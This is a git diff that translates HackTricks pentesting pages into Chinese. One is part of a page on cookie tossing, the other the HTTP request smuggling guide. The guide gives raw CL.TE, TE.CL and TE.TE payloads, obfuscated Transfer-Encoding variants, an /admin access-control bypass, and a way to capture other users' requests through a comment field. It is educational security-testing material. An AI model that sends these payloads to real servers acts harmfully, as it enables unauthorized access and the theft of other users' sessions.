-Most **websites will only use the first value**. Then, if an attacker wants to set a cookie it's better to set it before another one is set or set it with a more specific path.
+大多数**网站只会使用第一个值**。因此，如果攻击者想要设置一个cookie，最好在另一个cookie被设置之前设置它，或者设置一个更具体的路径。
 
 > [!WARNING]
-> Moreover, the capability to **set a cookie in a more specific path** is very interesting as you will be able to make the **victim work with his cookie except in the specific path where the malicious cookie set will be sent before**.
+> 此外，**在更具体的路径中设置cookie的能力**非常有趣，因为您将能够让**受害者在其cookie中工作，除了恶意cookie设置将被发送之前的特定路径**。
 
-### Protection Bypass
+### 保护绕过
 
-Possible protection against this attack would be that the **web server won't accept requests with two cookies with the same name but two different values**.
+对这种攻击的可能保护措施是**web服务器不接受具有相同名称但两个不同值的两个cookie的请求**。
 
-To bypass the scenario where the attacker is setting a cookie after the victim was already given the cookie, the attacker could cause a **cookie overflow** and then, once the **legit cookie is deleted, set the malicious one**.
+为了绕过攻击者在受害者已经获得cookie后设置cookie的场景，攻击者可以造成**cookie溢出**，然后，一旦**合法cookie被删除，设置恶意cookie**。
 
 {{#ref}}
 cookie-jar-overflow.md
 {{#endref}}
 
-Another useful **bypass** could be to **URL encode the name of the cookie** as some protections check for 2 cookies with the same name in a request and then the server will decode the names of the cookies.
+另一个有用的**绕过**可能是**URL编码cookie的名称**，因为一些保护措施检查请求中是否有两个具有相同名称的cookie，然后服务器将解码cookie的名称。
 
-### Cookie Bomb
+### Cookie炸弹
 
-A Cookie Tossing attack may also be used to perform a **Cookie Bomb** attack:
+Cookie Tossing攻击也可以用于执行**Cookie炸弹**攻击：
 
 {{#ref}}
 cookie-bomb.md
 {{#endref}}
 
-### Defense**s**
+### 防御
 
-#### **Use the prefix `__Host` in the cookie name**
+#### **在cookie名称中使用前缀`__Host`**
 
-- If a cookie name has this prefix, it **will only be accepted** in a Set-Cookie directive if it is marked Secure, was sent from a secure origin, does not include a Domain attribute, and has the Path attribute set to /
-- **This prevents subdomains from forcing a cookie to the apex domain since these cookies can be seen as "domain-locked"**
+- 如果cookie名称具有此前缀，**只有在标记为安全、从安全来源发送、不包括域属性并且路径属性设置为/**时，**它将被接受**在Set-Cookie指令中。
+- **这防止子域强制cookie到顶级域，因为这些cookie可以被视为“域锁定”**。
 
-### References
+### 参考
 
 - [**@blueminimal**](https://twitter.com/blueminimal)
 - [**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers)
@@ -65,4 +65,3 @@ cookie-bomb.md
 - [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F_wAzF4a7Xg)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md
index f5567a0d1..99ea1cf99 100644
--- a/src/pentesting-web/http-request-smuggling/README.md
+++ b/src/pentesting-web/http-request-smuggling/README.md
@@ -4,175 +4,174 @@
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度审视您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**发现并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，查找允许您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-## What is
+## 什么是
 
-This vulnerability occurs when a **desyncronization** between **front-end proxies** and the **back-end** server allows an **attacker** to **send** an HTTP **request** that will be **interpreted** as a **single request** by the **front-end** proxies (load balance/reverse-proxy) and **as 2 request** by the **back-end** server.\
-This allows a user to **modify the next request that arrives to the back-end server after his**.
+当**前端代理**与**后端**服务器之间发生**不同步**时，允许**攻击者**发送一个HTTP **请求**，该请求将被**前端**代理（负载均衡/反向代理）解释为**单个请求**，而被**后端**服务器解释为**两个请求**。\
+这使得用户能够**修改到达后端服务器的下一个请求**。
 
-### Theory
+### 理论
 
-[**RFC Specification (2161)**](https://tools.ietf.org/html/rfc2616)
+[**RFC 规范 (2161)**](https://tools.ietf.org/html/rfc2616)
 
-> If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.
+> 如果收到的消息同时包含 Transfer-Encoding 头字段和 Content-Length 头字段，则后者必须被忽略。
 
 **Content-Length**
 
-> The Content-Length entity header indicates the size of the entity-body, in bytes, sent to the recipient.
+> Content-Length 实体头指示发送给接收方的实体主体的大小（以字节为单位）。
 
 **Transfer-Encoding: chunked**
 
-> The Transfer-Encoding header specifies the form of encoding used to safely transfer the payload body to the user.\
-> Chunked means that large data is sent in a series of chunks
+> Transfer-Encoding 头指定用于安全传输有效负载主体的编码形式。\
+> Chunked 意味着大数据以一系列块的形式发送。
 
-### Reality
+### 现实
 
-The **Front-End** (a load-balance / Reverse Proxy) **process** the _**content-length**_ or the _**transfer-encoding**_ header and the **Back-end** server **process the other** one provoking a **desyncronization** between the 2 systems.\
-This could be very critical as **an attacker will be able to send one request** to the reverse proxy that will be **interpreted** by the **back-end** server **as 2 different requests**. The **danger** of this technique resides in the fact the **back-end** server **will interpret** the **2nd request injected** as if it **came from the next client** and the **real request** of that client will be **part** of the **injected request**.
+**前端**（负载均衡/反向代理）**处理** _**content-length**_ 或 _**transfer-encoding**_ 头，而**后端**服务器**处理另一个**，导致两个系统之间发生**不同步**。\
+这可能非常关键，因为**攻击者将能够向反向代理发送一个请求**，该请求将被**后端**服务器**解释为两个不同的请求**。这种技术的**危险**在于**后端**服务器**将解释**为**第二个注入请求**，就好像它**来自下一个客户端**，而该客户端的**真实请求**将是**注入请求**的一部分。
 
-### Particularities
+### 特点
 
-Remember that in HTTP **a new line character is composed by 2 bytes:**
+请记住，在HTTP中**换行符由2个字节组成：**
 
-- **Content-Length**: This header uses a **decimal number** to indicate the **number** of **bytes** of the **body** of the request. The body is expected to end in the last character, **a new line is not needed in the end of the request**.
-- **Transfer-Encoding:** This header uses in the **body** an **hexadecimal number** to indicate the **number** of **bytes** of the **next chunk**. The **chunk** must **end** with a **new line** but this new line **isn't counted** by the length indicator. This transfer method must end with a **chunk of size 0 followed by 2 new lines**: `0`
-- **Connection**: Based on my experience it's recommended to use **`Connection: keep-alive`** on the first request of the request Smuggling.
+- **Content-Length**：此头使用**十进制数字**指示请求**主体**的**字节数**。主体预计在最后一个字符结束，**请求末尾不需要换行符**。
+- **Transfer-Encoding:** 此头在**主体**中使用**十六进制数字**指示**下一个块**的**字节数**。**块**必须以**换行符**结束，但此换行符**不计入**长度指示符。此传输方法必须以**大小为0的块后跟2个换行符**结束：`0`
+- **Connection**：根据我的经验，建议在请求走私的第一个请求中使用**`Connection: keep-alive`**。
 
-## Basic Examples
+## 基本示例
 
 > [!TIP]
-> When trying to exploit this with Burp Suite **disable `Update Content-Length` and `Normalize HTTP/1 line endings`** in the repeater because some gadgets abuse newlines, carriage returns and malformed content-lengths.
+> 在尝试使用Burp Suite利用此漏洞时，**禁用 `Update Content-Length` 和 `Normalize HTTP/1 line endings`**，因为某些工具滥用换行符、回车和格式错误的内容长度。
 
-HTTP request smuggling attacks are crafted by sending ambiguous requests that exploit discrepancies in how front-end and back-end servers interpret the `Content-Length` (CL) and `Transfer-Encoding` (TE) headers. These attacks can manifest in different forms, primarily as **CL.TE**, **TE.CL**, and **TE.TE**. Each type represents a unique combination of how the front-end and back-end servers prioritize these headers. The vulnerabilities arise from the servers processing the same request in different ways, leading to unexpected and potentially malicious outcomes.
+HTTP请求走私攻击是通过发送模棱两可的请求来构造的，这些请求利用了前端和后端服务器在解释`Content-Length`（CL）和`Transfer-Encoding`（TE）头时的差异。这些攻击可以以不同形式表现，主要为**CL.TE**、**TE.CL**和**TE.TE**。每种类型代表前端和后端服务器如何优先处理这些头的独特组合。漏洞源于服务器以不同方式处理相同请求，导致意外和潜在的恶意结果。
 
-### Basic Examples of Vulnerability Types
+### 漏洞类型的基本示例
 
 ![https://twitter.com/SpiderSec/status/1200413390339887104?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104&ref_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104](../../images/EKi5edAUUAAIPIK.jpg)
 
 > [!NOTE]
-> To the previous table you should add the TE.0 technique, like CL.0 technique but using Transfer Encoding.
+> 在之前的表格中，您应该添加TE.0技术，类似于CL.0技术，但使用Transfer Encoding。
 
-#### CL.TE Vulnerability (Content-Length used by Front-End, Transfer-Encoding used by Back-End)
+#### CL.TE 漏洞（前端使用Content-Length，后端使用Transfer-Encoding）
 
-- **Front-End (CL):** Processes the request based on the `Content-Length` header.
-- **Back-End (TE):** Processes the request based on the `Transfer-Encoding` header.
-- **Attack Scenario:**
+- **前端 (CL)**：根据`Content-Length`头处理请求。
+- **后端 (TE)**：根据`Transfer-Encoding`头处理请求。
+- **攻击场景：**
 
-  - The attacker sends a request where the `Content-Length` header's value does not match the actual content length.
-  - The front-end server forwards the entire request to the back-end, based on the `Content-Length` value.
-  - The back-end server processes the request as chunked due to the `Transfer-Encoding: chunked` header, interpreting the remaining data as a separate, subsequent request.
-  - **Example:**
+- 攻击者发送一个请求，其中`Content-Length`头的值与实际内容长度不匹配。
+- 前端服务器根据`Content-Length`值将整个请求转发给后端。
+- 后端服务器由于`Transfer-Encoding: chunked`头将请求处理为分块，解释剩余数据为一个单独的后续请求。
+- **示例：**
 
-    ```
-    POST / HTTP/1.1
-    Host: vulnerable-website.com
-    Content-Length: 30
-    Connection: keep-alive
-    Transfer-Encoding: chunked
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 30
+Connection: keep-alive
+Transfer-Encoding: chunked
 
-    0
+0
 
-    GET /404 HTTP/1.1
-    Foo: x
-    ```
+GET /404 HTTP/1.1
+Foo: x
+```
 
-#### TE.CL Vulnerability (Transfer-Encoding used by Front-End, Content-Length used by Back-End)
+#### TE.CL 漏洞（前端使用Transfer-Encoding，后端使用Content-Length）
 
-- **Front-End (TE):** Processes the request based on the `Transfer-Encoding` header.
-- **Back-End (CL):** Processes the request based on the `Content-Length` header.
-- **Attack Scenario:**
+- **前端 (TE)**：根据`Transfer-Encoding`头处理请求。
+- **后端 (CL)**：根据`Content-Length`头处理请求。
+- **攻击场景：**
 
-  - The attacker sends a chunked request where the chunk size (`7b`) and actual content length (`Content-Length: 4`) do not align.
-  - The front-end server, honoring `Transfer-Encoding`, forwards the entire request to the back-end.
-  - The back-end server, respecting `Content-Length`, processes only the initial part of the request (`7b` bytes), leaving the rest as part of an unintended subsequent request.
-  - **Example:**
+- 攻击者发送一个分块请求，其中块大小（`7b`）和实际内容长度（`Content-Length: 4`）不一致。
+- 前端服务器遵循`Transfer-Encoding`，将整个请求转发给后端。
+- 后端服务器尊重`Content-Length`，仅处理请求的初始部分（`7b`字节），将其余部分留作意外的后续请求的一部分。
+- **示例：**
 
-    ```
-    POST / HTTP/1.1
-    Host: vulnerable-website.com
-    Content-Length: 4
-    Connection: keep-alive
-    Transfer-Encoding: chunked
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 4
+Connection: keep-alive
+Transfer-Encoding: chunked
 
-    7b
-    GET /404 HTTP/1.1
-    Host: vulnerable-website.com
-    Content-Type: application/x-www-form-urlencoded
-    Content-Length: 30
+7b
+GET /404 HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 30
 
-    x=
-    0
+x=
+0
 
-    ```
+```
 
-#### TE.TE Vulnerability (Transfer-Encoding used by both, with obfuscation)
+#### TE.TE 漏洞（两者都使用Transfer-Encoding，并进行模糊处理）
 
-- **Servers:** Both support `Transfer-Encoding`, but one can be tricked into ignoring it via obfuscation.
-- **Attack Scenario:**
+- **服务器**：两者都支持`Transfer-Encoding`，但可以通过模糊处理欺骗其中一个忽略它。
+- **攻击场景：**
 
-  - The attacker sends a request with obfuscated `Transfer-Encoding` headers.
-  - Depending on which server (front-end or back-end) fails to recognize the obfuscation, a CL.TE or TE.CL vulnerability may be exploited.
-  - The unprocessed part of the request, as seen by one of the servers, becomes part of a subsequent request, leading to smuggling.
-  - **Example:**
+- 攻击者发送一个带有模糊处理`Transfer-Encoding`头的请求。
+- 根据哪个服务器（前端或后端）未能识别模糊处理，可能会利用CL.TE或TE.CL漏洞。
+- 请求中未处理的部分，作为其中一个服务器所见，成为后续请求的一部分，导致走私。
+- **示例：**
 
-    ```
-    POST / HTTP/1.1
-    Host: vulnerable-website.com
-    Transfer-Encoding: xchunked
-    Transfer-Encoding : chunked
-    Transfer-Encoding: chunked
-    Transfer-Encoding: x
-    Transfer-Encoding: chunked
-    Transfer-Encoding: x
-    Transfer-Encoding:[tab]chunked
-    [space]Transfer-Encoding: chunked
-    X: X[\n]Transfer-Encoding: chunked
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: xchunked
+Transfer-Encoding : chunked
+Transfer-Encoding: chunked
+Transfer-Encoding: x
+Transfer-Encoding: chunked
+Transfer-Encoding: x
+Transfer-Encoding:[tab]chunked
+[space]Transfer-Encoding: chunked
+X: X[\n]Transfer-Encoding: chunked
 
-    Transfer-Encoding
-    : chunked
-    ```
+Transfer-Encoding
+: chunked
+```
 
-#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End)**
+#### **CL.CL 场景（前端和后端都使用Content-Length）**
 
-- Both servers process the request based solely on the `Content-Length` header.
-- This scenario typically does not lead to smuggling, as there's alignment in how both servers interpret the request length.
-- **Example:**
+- 两个服务器仅根据`Content-Length`头处理请求。
+- 此场景通常不会导致走私，因为两个服务器在解释请求长度时是一致的。
+- **示例：**
 
-  ```
-  POST / HTTP/1.1
-  Host: vulnerable-website.com
-  Content-Length: 16
-  Connection: keep-alive
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 16
+Connection: keep-alive
 
-  Normal Request
-  ```
+Normal Request
+```
 
-#### **CL.0 Scenario**
+#### **CL.0 场景**
 
-- Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. The back-end ignores the `Content-Length` header (which is treated as 0), but the front-end parses it.
-- It's crucial in understanding and crafting smuggling attacks, as it influences how servers determine the end of a request.
-- **Example:**
+- 指的是`Content-Length`头存在且值不为零，表明请求主体有内容。后端忽略`Content-Length`头（被视为0），但前端解析它。
+- 这在理解和构造走私攻击中至关重要，因为它影响服务器确定请求结束的方式。
+- **示例：**
 
-  ```
-  POST / HTTP/1.1
-  Host: vulnerable-website.com
-  Content-Length: 16
-  Connection: keep-alive
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 16
+Connection: keep-alive
 
-  Non-Empty Body
-  ```
+Non-Empty Body
+```
 
-#### TE.0 Scenario
-
-- Like the previous one but using TE
-- Technique [reported here](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
-- **Example**:
+#### TE.0 场景
 
+- 类似于前一个场景，但使用TE。
+- 技术[在此报告](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
+- **示例**:
 ```
 OPTIONS / HTTP/1.1
 Host: {HOST}
@@ -190,115 +189,111 @@ x: X
 EMPTY_LINE_HERE
 EMPTY_LINE_HERE
 ```
+#### 破坏网络服务器
 
-#### Breaking the web server
+该技术在可以**在读取初始HTTP数据时破坏网络服务器**但**不关闭连接**的场景中也很有用。这样，HTTP请求的**主体**将被视为**下一个HTTP请求**。
 
-This technique is also useful in scenarios where it's possible to **break a web server while reading the initial HTTP data** but **without closing the connection**. This way, the **body** of the HTTP request will be considered the **next HTTP request**.
+例如，如[**这篇文章**](https://mizu.re/post/twisty-python)中所解释的，在Werkzeug中可以发送一些**Unicode**字符，这将使服务器**崩溃**。然而，如果HTTP连接是使用**`Connection: keep-alive`**头创建的，请求的主体将不会被读取，连接仍将保持打开状态，因此请求的**主体**将被视为**下一个HTTP请求**。
 
-For example, as explained in [**this writeup**](https://mizu.re/post/twisty-python), In Werkzeug it was possible to send some **Unicode** characters and it will make the server **break**. However, if the HTTP connection was created with the header **`Connection: keep-alive`**, the body of the request won’t be read and the connection will still be open, so the **body** of the request will be treated as the **next HTTP request**.
-
-#### Forcing via hop-by-hop headers
-
-Abusing hop-by-hop headers you could indicate the proxy to **delete the header Content-Length or Transfer-Encoding so a HTTP request smuggling is possible to abuse**.
+#### 通过逐跳头强制
 
+滥用逐跳头，您可以指示代理**删除Content-Length或Transfer-Encoding头，以便可以滥用HTTP请求走私**。
 ```
 Connection: Content-Length
 ```
-
-For **more information about hop-by-hop headers** visit:
+对于**有关逐跳头部的更多信息**，请访问：
 
 {{#ref}}
 ../abusing-hop-by-hop-headers.md
 {{#endref}}
 
-## Finding HTTP Request Smuggling
+## 查找 HTTP 请求走私
 
-Identifying HTTP request smuggling vulnerabilities can often be achieved using timing techniques, which rely on observing how long it takes for the server to respond to manipulated requests. These techniques are particularly useful for detecting CL.TE and TE.CL vulnerabilities. Besides these methods, there are other strategies and tools that can be used to find such vulnerabilities:
+识别 HTTP 请求走私漏洞通常可以通过时间技术实现，这依赖于观察服务器响应被操纵请求所需的时间。这些技术对于检测 CL.TE 和 TE.CL 漏洞特别有用。除了这些方法，还有其他策略和工具可以用来发现此类漏洞：
 
-### Finding CL.TE Vulnerabilities Using Timing Techniques
+### 使用时间技术查找 CL.TE 漏洞
 
-- **Method:**
+- **方法：**
 
-  - Send a request that, if the application is vulnerable, will cause the back-end server to wait for additional data.
-  - **Example:**
+- 发送一个请求，如果应用程序存在漏洞，将导致后端服务器等待额外数据。
+- **示例：**
 
-    ```
-    POST / HTTP/1.1
-    Host: vulnerable-website.com
-    Transfer-Encoding: chunked
-    Connection: keep-alive
-    Content-Length: 4
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: chunked
+Connection: keep-alive
+Content-Length: 4
 
-    1
-    A
-    0
-    ```
+1
+A
+0
+```
 
-  - **Observation:**
-    - The front-end server processes the request based on `Content-Length` and cuts off the message prematurely.
-    - The back-end server, expecting a chunked message, waits for the next chunk that never arrives, causing a delay.
+- **观察：**
+- 前端服务器根据 `Content-Length` 处理请求，并提前截断消息。
+- 后端服务器期望接收分块消息，等待下一个从未到达的块，导致延迟。
 
-- **Indicators:**
-  - Timeouts or long delays in response.
-  - Receiving a 400 Bad Request error from the back-end server, sometimes with detailed server information.
+- **指标：**
+- 响应超时或长时间延迟。
+- 从后端服务器收到 400 Bad Request 错误，有时附带详细的服务器信息。
 
-### Finding TE.CL Vulnerabilities Using Timing Techniques
+### 使用时间技术查找 TE.CL 漏洞
 
-- **Method:**
+- **方法：**
 
-  - Send a request that, if the application is vulnerable, will cause the back-end server to wait for additional data.
-  - **Example:**
+- 发送一个请求，如果应用程序存在漏洞，将导致后端服务器等待额外数据。
+- **示例：**
 
-    ```
-    POST / HTTP/1.1
-    Host: vulnerable-website.com
-    Transfer-Encoding: chunked
-    Connection: keep-alive
-    Content-Length: 6
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Transfer-Encoding: chunked
+Connection: keep-alive
+Content-Length: 6
 
-    0
-    X
-    ```
+0
+X
+```
 
-  - **Observation:**
-    - The front-end server processes the request based on `Transfer-Encoding` and forwards the entire message.
-    - The back-end server, expecting a message based on `Content-Length`, waits for additional data that never arrives, causing a delay.
+- **观察：**
+- 前端服务器根据 `Transfer-Encoding` 处理请求并转发整个消息。
+- 后端服务器期望根据 `Content-Length` 接收消息，等待从未到达的额外数据，导致延迟。
 
-### Other Methods to Find Vulnerabilities
+### 查找漏洞的其他方法
 
-- **Differential Response Analysis:**
-  - Send slightly varied versions of a request and observe if the server responses differ in an unexpected way, indicating a parsing discrepancy.
-- **Using Automated Tools:**
-  - Tools like Burp Suite's 'HTTP Request Smuggler' extension can automatically test for these vulnerabilities by sending various forms of ambiguous requests and analyzing the responses.
-- **Content-Length Variance Tests:**
-  - Send requests with varying `Content-Length` values that are not aligned with the actual content length and observe how the server handles such mismatches.
-- **Transfer-Encoding Variance Tests:**
-  - Send requests with obfuscated or malformed `Transfer-Encoding` headers and monitor how differently the front-end and back-end servers respond to such manipulations.
+- **差异响应分析：**
+- 发送略有不同版本的请求，观察服务器响应是否以意外方式不同，指示解析差异。
+- **使用自动化工具：**
+- 像 Burp Suite 的 'HTTP Request Smuggler' 扩展可以通过发送各种模糊请求并分析响应来自动测试这些漏洞。
+- **Content-Length 变异测试：**
+- 发送具有不同 `Content-Length` 值的请求，这些值与实际内容长度不一致，并观察服务器如何处理此类不匹配。
+- **Transfer-Encoding 变异测试：**
+- 发送具有模糊或格式错误的 `Transfer-Encoding` 头的请求，并监控前端和后端服务器对这种操控的不同响应。
 
-### HTTP Request Smuggling Vulnerability Testing
+### HTTP 请求走私漏洞测试
 
-After confirming the effectiveness of timing techniques, it's crucial to verify if client requests can be manipulated. A straightforward method is to attempt poisoning your requests, for instance, making a request to `/` yield a 404 response. The `CL.TE` and `TE.CL` examples previously discussed in [Basic Examples](./#basic-examples) demonstrate how to poison a client's request to elicit a 404 response, despite the client aiming to access a different resource.
+在确认时间技术的有效性后，验证客户端请求是否可以被操纵至关重要。一个简单的方法是尝试毒化你的请求，例如，使对 `/` 的请求返回 404 响应。之前在 [基本示例](./#basic-examples) 中讨论的 `CL.TE` 和 `TE.CL` 示例演示了如何毒化客户端请求以引发 404 响应，尽管客户端旨在访问不同的资源。
 
-**Key Considerations**
+**关键考虑事项**
 
-When testing for request smuggling vulnerabilities by interfering with other requests, bear in mind:
+在通过干扰其他请求测试请求走私漏洞时，请记住：
 
-- **Distinct Network Connections:** The "attack" and "normal" requests should be dispatched over separate network connections. Utilizing the same connection for both doesn't validate the vulnerability's presence.
-- **Consistent URL and Parameters:** Aim to use identical URLs and parameter names for both requests. Modern applications often route requests to specific back-end servers based on URL and parameters. Matching these increases the likelihood that both requests are processed by the same server, a prerequisite for a successful attack.
-- **Timing and Racing Conditions:** The "normal" request, meant to detect interference from the "attack" request, competes against other concurrent application requests. Therefore, send the "normal" request immediately following the "attack" request. Busy applications may necessitate multiple trials for conclusive vulnerability confirmation.
-- **Load Balancing Challenges:** Front-end servers acting as load balancers may distribute requests across various back-end systems. If the "attack" and "normal" requests end up on different systems, the attack won't succeed. This load balancing aspect may require several attempts to confirm a vulnerability.
-- **Unintended User Impact:** If your attack inadvertently impacts another user's request (not the "normal" request you sent for detection), this indicates your attack influenced another application user. Continuous testing could disrupt other users, mandating a cautious approach.
+- **独立的网络连接：** “攻击”和“正常”请求应通过独立的网络连接发送。对两个请求使用相同的连接并不能验证漏洞的存在。
+- **一致的 URL 和参数：** 力求对两个请求使用相同的 URL 和参数名称。现代应用程序通常根据 URL 和参数将请求路由到特定的后端服务器。匹配这些可以增加两个请求由同一服务器处理的可能性，这是成功攻击的前提。
+- **时间和竞争条件：** “正常”请求旨在检测“攻击”请求的干扰，与其他并发应用请求竞争。因此，在“攻击”请求后立即发送“正常”请求。繁忙的应用程序可能需要多次尝试以确认漏洞。
+- **负载均衡挑战：** 作为负载均衡器的前端服务器可能会将请求分配到不同的后端系统。如果“攻击”和“正常”请求最终落在不同的系统上，攻击将不会成功。这个负载均衡方面可能需要多次尝试以确认漏洞。
+- **意外用户影响：** 如果你的攻击无意中影响了另一个用户的请求（不是你发送的“正常”请求），这表明你的攻击影响了另一个应用用户。持续测试可能会干扰其他用户，因此需要谨慎处理。
 
-## Abusing HTTP Request Smuggling
+## 滥用 HTTP 请求走私
 
-### Circumventing Front-End Security via HTTP Request Smuggling
+### 通过 HTTP 请求走私绕过前端安全
 
-Sometimes, front-end proxies enforce security measures, scrutinizing incoming requests. However, these measures can be circumvented by exploiting HTTP Request Smuggling, allowing unauthorized access to restricted endpoints. For instance, accessing `/admin` might be prohibited externally, with the front-end proxy actively blocking such attempts. Nonetheless, this proxy may neglect to inspect embedded requests within a smuggled HTTP request, leaving a loophole for bypassing these restrictions.
+有时，前端代理会实施安全措施，审查传入请求。然而，这些措施可以通过利用 HTTP 请求走私来绕过，从而允许未经授权访问受限端点。例如，访问 `/admin` 可能在外部被禁止，前端代理积极阻止此类尝试。然而，这个代理可能未能检查嵌入在走私 HTTP 请求中的请求，从而留下绕过这些限制的漏洞。
 
-Consider the following examples illustrating how HTTP Request Smuggling can be used to bypass front-end security controls, specifically targeting the `/admin` path which is typically guarded by the front-end proxy:
-
-**CL.TE Example**
+考虑以下示例，说明如何使用 HTTP 请求走私绕过前端安全控制，特别是针对通常由前端代理保护的 `/admin` 路径：
 
+**CL.TE 示例**
 ```
 POST / HTTP/1.1
 Host: [redacted].web-security-academy.net
@@ -315,11 +310,9 @@ Content-Length: 10
 
 x=
 ```
+在CL.TE攻击中，`Content-Length`头用于初始请求，而后续嵌入请求则利用`Transfer-Encoding: chunked`头。前端代理处理初始`POST`请求，但未能检查嵌入的`GET /admin`请求，从而允许未经授权访问`/admin`路径。
 
-In the CL.TE attack, the `Content-Length` header is leveraged for the initial request, while the subsequent embedded request utilizes the `Transfer-Encoding: chunked` header. The front-end proxy processes the initial `POST` request but fails to inspect the embedded `GET /admin` request, allowing unauthorized access to the `/admin` path.
-
-**TE.CL Example**
-
+**TE.CL 示例**
 ```
 POST / HTTP/1.1
 Host: [redacted].web-security-academy.net
@@ -335,15 +328,13 @@ a=x
 0
 
 ```
+相反，在TE.CL攻击中，初始的`POST`请求使用`Transfer-Encoding: chunked`，而后续嵌入的请求则基于`Content-Length`头进行处理。与CL.TE攻击类似，前端代理忽视了被隐藏的`GET /admin`请求，意外地授予了对受限`/admin`路径的访问。
 
-Conversely, in the TE.CL attack, the initial `POST` request uses `Transfer-Encoding: chunked`, and the subsequent embedded request is processed based on the `Content-Length` header. Similar to the CL.TE attack, the front-end proxy overlooks the smuggled `GET /admin` request, inadvertently granting access to the restricted `/admin` path.
+### 揭示前端请求重写 <a href="#revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
 
-### Revealing front-end request rewriting <a href="#revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
-
-Applications often employ a **front-end server** to modify incoming requests before passing them to the back-end server. A typical modification involves adding headers, such as `X-Forwarded-For: <IP of the client>`, to relay the client's IP to the back-end. Understanding these modifications can be crucial, as it might reveal ways to **bypass protections** or **uncover concealed information or endpoints**.
-
-To investigate how a proxy alters a request, locate a POST parameter that the back-end echoes in the response. Then, craft a request, using this parameter last, similar to the following:
+应用程序通常使用**前端服务器**来修改传入请求，然后将其传递给后端服务器。典型的修改涉及添加头信息，例如`X-Forwarded-For: <IP of the client>`，以将客户端的IP转发给后端。理解这些修改可能至关重要，因为它可能揭示**绕过保护**或**发现隐藏的信息或端点**的方法。
 
+要调查代理如何更改请求，找到一个后端在响应中回显的POST参数。然后，构造一个请求，使用这个参数作为最后一个，类似于以下内容：
 ```
 POST / HTTP/1.1
 Host: vulnerable-website.com
@@ -360,21 +351,19 @@ Content-Length: 100
 
 search=
 ```
+在这个结构中，后续请求组件被附加在 `search=` 之后，这是在响应中反映的参数。这个反射将暴露后续请求的头部。
 
-In this structure, subsequent request components are appended after `search=`, which is the parameter reflected in the response. This reflection will expose the headers of the subsequent request.
+重要的是要将嵌套请求的 `Content-Length` 头与实际内容长度对齐。建议从一个小值开始并逐渐增加，因为过低的值会截断反射的数据，而过高的值可能会导致请求出错。
 
-It's important to align the `Content-Length` header of the nested request with the actual content length. Starting with a small value and incrementing gradually is advisable, as too low a value will truncate the reflected data, while too high a value can cause the request to error out.
+该技术在 TE.CL 漏洞的上下文中也适用，但请求应以 `search=\r\n0` 结束。无论换行符如何，值将附加到搜索参数中。
 
-This technique is also applicable in the context of a TE.CL vulnerability, but the request should terminate with `search=\r\n0`. Regardless of the newline characters, the values will append to the search parameter.
+此方法主要用于理解前端代理所做的请求修改，基本上进行自我导向的调查。
 
-This method primarily serves to understand the request modifications made by the front-end proxy, essentially performing a self-directed investigation.
+### 捕获其他用户的请求 <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
 
-### Capturing other users' requests <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
-
-It's feasible to capture the requests of the next user by appending a specific request as the value of a parameter during a POST operation. Here's how this can be accomplished:
-
-By appending the following request as the value of a parameter, you can store the subsequent client's request:
+通过在 POST 操作期间将特定请求附加为参数的值，可以捕获下一个用户的请求。以下是如何实现这一点的： 
 
+通过将以下请求附加为参数的值，您可以存储后续客户端的请求：
 ```
 POST / HTTP/1.1
 Host: ac031feb1eca352f8012bbe900fa00a1.web-security-academy.net
@@ -394,22 +383,20 @@ Cookie: session=4X6SWQeR8KiOPZPF2Gpca2IKeA1v4KYi
 
 csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40email.com&comment=
 ```
+在这种情况下，**comment 参数**旨在存储在公开可访问页面的帖子评论部分中的内容。因此，后续请求的内容将作为评论出现。
 
-In this scenario, the **comment parameter** is intended to store the contents within a post's comment section on a publicly accessible page. Consequently, the subsequent request's contents will appear as a comment.
+然而，这种技术有其局限性。通常，它仅捕获 smuggled 请求中使用的参数分隔符之前的数据。对于 URL 编码的表单提交，这个分隔符是 `&` 字符。这意味着从受害者用户请求中捕获的内容将在第一个 `&` 处停止，这可能甚至是查询字符串的一部分。
 
